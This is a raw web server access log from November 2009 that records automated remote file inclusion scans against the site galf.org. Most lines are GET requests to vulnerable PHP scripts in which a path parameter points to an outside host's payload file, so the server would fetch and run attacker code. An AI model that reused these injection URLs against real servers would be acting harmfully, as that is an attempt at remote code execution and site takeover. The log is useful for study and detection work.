85.17.19.172 - - [02/Nov/2009:05:34:39 -0800] "GET /logs//skin/dognara_gallery/login.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.17.19.172 - - [02/Nov/2009:05:34:39 -0800] "GET /logs/access.log%20%20//skin/dognara_gallery/login.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.17.19.172 - - [02/Nov/2009:05:34:42 -0800] "GET /logs//skin/dognara_gallery/login.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.17.19.172 - - [02/Nov/2009:05:34:42 -0800] "GET /logs/access.log%20%20//skin/dognara_gallery/login.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.17.19.172 - - [02/Nov/2009:05:34:42 -0800] "GET /skin/dognara_gallery/login.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [02/Nov/2009:05:34:59 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/i.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [02/Nov/2009:05:34:59 -0800] "GET /logs/access_090810.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/i.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [02/Nov/2009:05:34:59 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/i.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [02/Nov/2009:05:35:00 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/i.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [02/Nov/2009:05:35:00 -0800] "GET /logs/access_090810.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/i.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [02/Nov/2009:05:35:00 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/i.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [02/Nov/2009:05:35:03 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/i.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
85.111.12.199 - - [02/Nov/2009:05:35:03 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/i.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
85.111.12.199 - - [02/Nov/2009:05:35:03 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/i.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
85.111.12.199 - - [02/Nov/2009:05:35:07 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/i.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
85.111.12.199 - - [02/Nov/2009:05:35:07 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/i.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
85.111.12.199 - - [02/Nov/2009:05:35:07 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/i.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
74.50.85.59 - - [02/Nov/2009:05:35:44 -0800] "GET /logs/access_090316.log/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.98.47.66 - - [02/Nov/2009:05:36:25 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://aldi.webng.com/data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
208.98.47.66 - - [02/Nov/2009:05:36:25 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://aldi.webng.com/data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
208.98.47.66 - - [02/Nov/2009:05:36:25 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://aldi.webng.com/data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
210.110.97.12 - - [02/Nov/2009:05:36:26 -0800] "GET /logs/access_090504.log/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [02/Nov/2009:05:36:30 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/i.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [02/Nov/2009:05:36:30 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/i.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [02/Nov/2009:05:36:30 -0800] "GET /logs/access_090810.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/i.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [02/Nov/2009:05:36:36 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/i.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [02/Nov/2009:05:36:36 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/i.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [02/Nov/2009:05:36:36 -0800] "GET /logs/access_090810.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/i.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [02/Nov/2009:05:36:52 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/i.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
85.111.12.199 - - [02/Nov/2009:05:36:52 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/i.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
85.111.12.199 - - [02/Nov/2009:05:36:52 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/i.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
85.111.12.199 - - [02/Nov/2009:05:36:58 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/i.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
85.111.12.199 - - [02/Nov/2009:05:36:58 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/i.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
85.111.12.199 - - [02/Nov/2009:05:36:58 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/i.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.122.46.179 - - [02/Nov/2009:05:39:07 -0800] "GET /logs/access_090810.log/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.97.189.33 - - [02/Nov/2009:05:39:07 -0800] "GET /logs/access_090330.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [02/Nov/2009:05:39:10 -0800] "GET /logs/access_090615.log/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.97.189.33 - - [02/Nov/2009:05:39:20 -0800] "GET /logs/access_090706.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.97.189.33 - - [02/Nov/2009:05:39:57 -0800] "GET /logs/access_090330.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [02/Nov/2009:05:40:00 -0800] "GET /logs/access_090615.log/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [02/Nov/2009:05:40:00 -0800] "GET /logs/access_090810.log/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.97.189.33 - - [02/Nov/2009:05:40:03 -0800] "GET /logs/access_090706.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
113.52.152.25 - - [02/Nov/2009:05:40:52 -0800] "GET /logs/access_090615.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.displayplus.net/bbs//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:05:41:16 -0800] "GET /logs/access_091012.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:05:41:25 -0800] "GET /logs/access_091012.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
195.187.79.41 - - [02/Nov/2009:05:41:26 -0800] "GET /logs/access_090914.log/index.php?body=http://188.165.29.1/n4v/RFI-SCAN.V2.ID.PRIVATE.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
195.187.79.41 - - [02/Nov/2009:05:41:27 -0800] "GET /index.php?body=http://188.165.29.1/n4v/RFI-SCAN.V2.ID.PRIVATE.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
195.187.79.41 - - [02/Nov/2009:05:41:44 -0800] "GET /logs/access_090914.log/index.php?body=http://188.165.29.1/n4v/RFI-SCAN.V2.ID.PRIVATE.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.187.79.41 - - [02/Nov/2009:05:41:45 -0800] "GET /index.php?body=http://188.165.29.1/n4v/RFI-SCAN.V2.ID.PRIVATE.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.187.79.41 - - [02/Nov/2009:05:41:45 -0800] "GET /logs/index.php?body=http://188.165.29.1/n4v/RFI-SCAN.V2.ID.PRIVATE.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:05:41:55 -0800] "GET /logs/access_091012.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
195.187.79.41 - - [02/Nov/2009:05:42:30 -0800] "GET /logs/access_090413.log/index.php?body=http://188.165.29.1/n4v/RFI-SCAN.V2.ID.PRIVATE.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:05:42:50 -0800] "GET /logs/access_091012.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
195.187.79.41 - - [02/Nov/2009:05:42:58 -0800] "GET /logs/access_090413.log/index.php?body=http://188.165.29.1/n4v/RFI-SCAN.V2.ID.PRIVATE.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:05:43:26 -0800] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [02/Nov/2009:05:43:26 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [02/Nov/2009:05:43:27 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [02/Nov/2009:05:43:32 -0800] "GET /logs/access_091012.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.98.47.66 - - [02/Nov/2009:05:43:39 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://aldi.webng.com/data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.98.47.66 - - [02/Nov/2009:05:43:39 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://aldi.webng.com/data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.98.47.66 - - [02/Nov/2009:05:43:39 -0800] "GET /logs/access_090330.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://aldi.webng.com/data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.98.47.66 - - [02/Nov/2009:05:43:53 -0800] "GET /logs/access_090504.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://aldi.webng.com/data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:05:43:54 -0800] "GET /logs/access_091012.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:05:43:55 -0800] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [02/Nov/2009:05:43:57 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [02/Nov/2009:05:44:00 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
80.93.57.123 - - [02/Nov/2009:05:44:13 -0800] "GET /logs/access_090921.log/?sourcedir=http://3gsmdb.com/opkt/.safe??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.galf.org"
80.93.57.123 - - [02/Nov/2009:05:44:13 -0800] "GET /?sourcedir=http://3gsmdb.com/opkt/.safe??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.820" "www.galf.org"
80.93.57.123 - - [02/Nov/2009:05:44:13 -0800] "GET /logs/?sourcedir=http://3gsmdb.com/opkt/.safe??? HTTP/1.1" 200 4799 "-" "libwww-perl/5.820" "www.galf.org"
222.97.189.33 - - [02/Nov/2009:05:44:16 -0800] "GET /logs/access_090803.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.97.189.33 - - [02/Nov/2009:05:44:16 -0800] "GET /logs/access_090316.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:05:45:04 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [02/Nov/2009:05:45:04 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [02/Nov/2009:05:45:04 -0800] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [02/Nov/2009:05:45:47 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://h1.ripway.com/aurel12/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [02/Nov/2009:05:45:47 -0800] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://h1.ripway.com/aurel12/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [02/Nov/2009:05:45:47 -0800] "GET /logs/access_091012.log%20%20/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://h1.ripway.com/aurel12/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.17.19.172 - - [02/Nov/2009:05:46:17 -0800] "GET /login.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.17.19.172 - - [02/Nov/2009:05:46:17 -0800] "GET /logs/access.log%20%20//login.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.17.19.172 - - [02/Nov/2009:05:46:17 -0800] "GET /logs//login.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.17.19.172 - - [02/Nov/2009:05:46:18 -0800] "GET /login.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.17.19.172 - - [02/Nov/2009:05:46:18 -0800] "GET /logs//login.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.17.19.172 - - [02/Nov/2009:05:46:18 -0800] "GET /logs/access.log%20%20//login.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.97.189.33 - - [02/Nov/2009:05:46:44 -0800] "GET /logs/access_090316.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.97.189.33 - - [02/Nov/2009:05:46:44 -0800] "GET /logs/access_090803.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [02/Nov/2009:05:46:58 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [02/Nov/2009:05:46:58 -0800] "GET /logs/access_091012.log%20%20/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [02/Nov/2009:05:46:58 -0800] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [02/Nov/2009:05:47:04 -0800] "GET /logs/access_090601.log%20%20/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [02/Nov/2009:05:47:04 -0800] "GET /logs/access_090615.log%20%20/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [02/Nov/2009:05:47:04 -0800] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [02/Nov/2009:05:47:04 -0800] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [02/Nov/2009:05:47:08 -0800] "GET /logs/access_090518.log%20%20/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [02/Nov/2009:05:47:08 -0800] "GET /logs/access_090504.log%20%20/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.93.57.123 - - [02/Nov/2009:05:47:12 -0800] "GET /logs/access_090518.log%20/?sourcedir=http://3gsmdb.com/opkt/.safe??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.galf.org"
222.122.46.179 - - [02/Nov/2009:05:47:16 -0800] "GET /logs/access_090803.log%20%20/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [02/Nov/2009:05:47:20 -0800] "GET /logs/access_090330.log%20%20/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [02/Nov/2009:05:47:20 -0800] "GET /logs/access_090525.log%20%20/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [02/Nov/2009:05:47:20 -0800] "GET /logs/access_090928.log%20%20/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [02/Nov/2009:05:47:24 -0800] "GET /logs/access_090713.log%20%20/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [02/Nov/2009:05:47:24 -0800] "GET /logs/access_090831.log%20%20/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [02/Nov/2009:05:47:24 -0800] "GET /logs/access_090817.log%20%20/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [02/Nov/2009:05:47:24 -0800] "GET /logs/access_090727.log%20%20/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [02/Nov/2009:05:47:24 -0800] "GET /logs/access_090914.log%20%20/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [02/Nov/2009:05:47:25 -0800] "GET /logs/access.log%20%20/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.122.46.179 - - [02/Nov/2009:05:47:25 -0800] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.122.46.179 - - [02/Nov/2009:05:47:25 -0800] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.122.46.179 - - [02/Nov/2009:05:47:29 -0800] "GET /logs/access_090629.log%20%20/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [02/Nov/2009:05:47:29 -0800] "GET /logs/access_090720.log%20%20/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [02/Nov/2009:05:47:29 -0800] "GET /logs/access_090608.log%20%20/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [02/Nov/2009:05:47:29 -0800] "GET /logs/access_090824